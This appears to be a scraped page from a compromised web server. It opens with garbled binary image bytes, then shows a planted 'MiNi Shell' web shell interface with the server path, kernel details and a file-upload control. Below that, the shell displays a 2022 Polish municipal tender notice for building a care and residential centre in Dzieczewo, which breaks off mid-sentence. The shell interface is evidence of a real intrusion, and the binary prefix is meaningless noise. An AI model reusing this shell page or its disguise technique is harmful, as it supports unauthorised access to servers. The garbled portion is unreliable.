JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220207/0004899101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utworzenie Centrum Opiekuńczo - Mieszkalnego w Dzieczewie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Siemiątkowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Władysława Reymonta 3A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemiątkowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-135</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@siemiatkowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.ugsiemiatkowo.nv.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie Centrum Opiekuńczo - Mieszkalnego w Dzieczewie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-58fdf44e-87f8-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00048991</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00007378/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Utworzenie Centrum opiekuńczo-mieszkalnego w Dzieczewie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.sidaspzp.pl/zamawiajacy/gmina-siemiatkowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między<br/>Zamawiającym, a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w<br/>rozumieniu ustawy z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną (tj. Dz.U. z 2020r. poz. 344 ). Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków<br/>komunikacji elektronicznej, za pośrednictwem Platformy zamówień publicznych (Platforma ZP) który<br/>dostępny jest po zalogowaniu na stronie https://app.sidaspzp.pl<br/>Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej.<br/>Zaleca się , aby komunikacja z Wykonawcami odbywała się tylko na platformie SIDAS, a nie za<br/>pośrednictwem e-mail.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korespondencja przy użyciu środków komunikacji elektronicznej odbywa się w następujący sposób:<br/>1.Przed upływem terminu składania ofert (między innymi: pytania do postępowania, wnioski o wyjaśnienie SWZ) - Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert).<br/>I. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem Platformy ZP.<br/>II. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, na adres: ug@siemiatkowo.pl<br/>III. Zamawiający dopuszcza również możliwość komunikowania się (z wyłączeniem oferty i załączników do oferty) za pomocą poczty elektronicznej, na adres poczty elektronicznej wskazany w pkt. II.<br/>Sposób sporządzania i przekazywania informacji określają rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (Dz.U. z 2020 r., poz. 2452) w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzenie Ministra Rozwoju, pracy i technologii z dnia 30 grudnia 2020 r. (Dz.U. z 2020 r., poz. 2415) w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać Zamawiający od wykonawcy.<br/>2. Komunikacja za pośrednictwem Platformy ZP:<br/>2.1. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. rejestrując się bezpłatnie lub w przypadku posiadania konta na Platformie ZP, logując się akceptuje warunki korzystania z platformy, określone w regulaminie dostępnym pod adresem: https://sidaspzp.pl/ oraz<br/>uznaje go za wiążący.<br/>2.2. Szczegółowa instrukcja obsługi Platformy ZP, zawierająca instrukcję korzystania z platformy przez wykonawcę jest zamieszczona pod adresem https://sidaspzp.pl/<br/>2.3. Każdy załączany plik zawierający dokumenty, oświadczenia lub pełnomocnictwa musi być uprzednio opatrzony podpisem kwalifikowanym, osobistym lub profilem zaufanym przez upoważnione osoby reprezentujące odpowiednio wykonawcę, wykonawcę wspólnie ubiegającego się o udzielenie<br/>zamówienia, inny podmiot, na którego zdolnościach lub sytuacji polega wykonawca na zasadach określonych w art. 118 ustawy PZP lub wykonawców.<br/>2.4. Za datę wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się datę wysłania wiadomości wraz z załącznikiem z poziomu zakładki „Komunikacja”, która prezentowana jest również w<br/>wysłanej wiadomości.<br/>3. Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy:<br/>3.1. ważnego kwalifikowanego podpisu elektronicznego, wystawionego przez dostawcę kwalifikowanej<br/>usługi zaufania, będącego podmiotem świadczącym usługi certyfikacyjne spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. – o usługach zaufania oraz identyfikacji elektronicznej (Dz.U. z 2020 r. poz. 1173 z późn. zm.) lub<br/>3.2. podpisu zaufanego, zgodnie z art. 3 pkt 14a ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub<br/>3.3. podpisu osobistego, zgodnie z art. 2 ust. 1 pkt 9 ustawy z 6 sierpnia 2010 r. o dowodach osobistych(Dz.U. z 2020 r. poz. 332).<br/>4. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (<br/>Dz.U.z 2020r.poz.2452)w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego zaleca podpisywanie dokumentów PDF formatem<br/>PAdES.<br/>Pozostałe informacje zawarto w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu w trakcie trwania postępowania czy realizacji umowy na zamówienie, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych. 2. Podanie przez Panią/Pana danych osobowych jest obowiązkowe, gdyż przesłankę przetwarzania danych osobowych stanowi przepis prawa Pani/Pan dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane. 3. Ponadto:<br/>􀀀administratorem Pani/Pana danych osobowych jest Wójt Gminy Siemiątkowo ul. Władysława Reymonta 3A, 09-135 Siemiątkowo;<br/> w sprawach z zakresu ochrony danych osobowych może się Pan/Pani kontaktować z Inspektorem Ochrony Danych pod adresem e-mail: dpo@siemiatkowo.pl tel. 23 679-61-76 w. 16. ;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: Utworzenie Centrum Opiekuńczo -Mieszkalnego w Dzieczewie, Znak sprawy: 271.1.2.2022, prowadzonym w trybie podstawowym bez<br/>negocjacji;<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych, dalej „ustawa Pzp”;<br/>􀀀Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 lat od dnia zakończenie postępowania, a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą w/w przedział czasowy, okres przechowywania obejmuje ten termin;<br/>􀀀obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>􀀀w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>􀀀posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.<br/>W trakcie oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.1.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest robota budowlana realizowana w formule „zaprojektuj i<br/>wybuduj’ polegającą na zaprojektowaniu i budowie budynku Centrum opiekuńczo -<br/>mieszkalnego.<br/>2. Zamówienie obejmuje opracowanie kompleksowej dokumentacji projektowej, uzyskanie<br/>kompletu uzgodnień oraz warunków technicznych, uzyskanie pozwolenia na budowę i budowę<br/>budynku wraz z zagospodarowaniem terenu. Zamówienie obejmuje również uzyskanie w imieniu<br/>zamawiającego pozwolenia na użytkowanie obiektu.<br/>3. Przedmiot zamówienia nie został podzielony na części. Zamawiający udziela zamówienia w<br/>częściach, a każde z nich stanowi przedmiot odrębnego postępowania przetargowego.<br/>4. Szczegółowy opis, zakres zamówienia znajduje się w Dokumentacji technicznej (Programie<br/>Funkcjonalno-Użytkowym) – Załącznik nr 5 do SWZ.<br/>5. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w<br/>projektowanych postanowieniach umowy, stanowiących Załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena oferty brutto” – C<br/>„Okres gwarancji na wykonane roboty” - G</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Wykonawca spełni warunek w zakresie zdolności technicznej lub zawodowej, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej co najmniej:<br/>- 1 robotę budowlaną prowadzoną w formule zaprojektuj i wybuduj, obejmujące wykonanie<br/>budynku mieszkalno – usługowego lub dowolnego budynku przeznaczonego do użyteczności<br/>publicznej, o wartości min. 1200000,00 zł brutto<br/>2) Wykonawca spełni warunek w zakresie zdolności technicznej lub zawodowej, jeżeli wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonaniu<br/>zamówienia i posiadają uprawnienia budowlane do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie, wydane na podstawie przepisów obowiązujących w czasie ich<br/>wydania (jeżeli dotyczy), w poniżej wskazanej specjalności (wykaz osób min.):<br/>a) 1 osoba - projektant posiadający aktualne uprawnienia do projektowania bez ograniczeń w<br/>specjalności architektonicznej.<br/>b) 1 osoba - projektant posiadający aktualne uprawnienia do projektowania bez ograniczeń w<br/>specjalności konstrukcyjno – budowlanej.<br/>c) 1 osoba - projektant posiadający aktualne uprawnienia do projektowania bez ograniczeń w<br/>specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/>d) 1 osoba - projektant posiadający aktualne uprawnienia do projektowania bez ograniczeń w<br/>specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Dopuszcza się łączenie funkcji przez jedną osobę w przypadku posiadania kilku rodzajów<br/>uprawnień lub kwalifikacji.<br/>e) 1 osoba - pełniąca funkcję Kierownika budowy – kierownik robót ogólnobudowlanych,<br/>􀀀posiadająca uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej (zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 19 maja 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie, (Dz. U. 2019 poz. 831) lub odpowiadające im uprawnienia budowlane.<br/>f) 1 osoba - pełniąca funkcję Kierownika robót w poniżej wskazanej specjalności,<br/>􀀀posiadająca uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, (zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 19 maja 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie, (Dz. U. 2019 poz. 831) lub odpowiadające im uprawnienia budowlane.<br/>g) 1 osoba – pełniąca funkcję Kierownika budowy w poniżej wskazanej specjalności,<br/>􀀀posiadająca uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (zgodnie z rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 19 maja 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie, Dz. U. 2019 poz. 831) lub odpowiadające im uprawnienia budowlane w zakresie instalacji elektrycznych.<br/>Zamawiający dopuszcza posiadanie ww. uprawnień przez jedną osobę lub osoby, które posiadają więcej niż 1 uprawnienie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Ad. 1) W zakresie doświadczenia Wykonawca zobowiązany będzie złożyć<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych<br/>dokumentów - inne dokumenty.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót wykonywanych wspólnie z innymi<br/>Wykonawcami, wówczas w wykazie należy wskazać roboty budowlane, w których wykonaniu<br/>Wykonawca ten bezpośrednio uczestniczył.<br/>Wykaz robót – przygotowany wg Załącznika nr 6 do SWZ.<br/>Za wykonaną robotę budowlaną Zamawiający rozumie taka robotę, która została zrealizowana w<br/>ramach danej umowy i odebrana przez Zamawiającego/osobę wskazaną przez Klienta/Inwestora, jako<br/>wykonaną zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. Zamawiający zastrzega<br/>sobie prawo do ewentualnego sprawdzenia prawdziwości przedstawianych danych, które będą<br/>wyszczególnione w ofercie.<br/>2) Wykaz 